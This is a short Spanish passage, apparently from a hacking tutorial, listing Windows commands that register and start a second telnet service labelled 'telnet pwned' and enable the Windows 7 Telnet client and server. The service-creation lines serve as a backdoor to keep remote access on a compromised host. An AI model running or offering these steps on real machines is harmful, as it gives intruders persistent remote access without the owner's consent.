Otra opción es crear otro servicio para el telnet y activarlo:
services CREATESVRANY "telnet2" "telnet pwned" "c:\windows\svrany.exe" "c:\windows\system32\tlntsvr.exe"
net start telnet2
En Windows 7 hay otra opción:
Activar el cliente.
pkgmgr /iu:”TelnetClient”
Activar el servidor.
pkgmgr /iu:”TelnetServer”
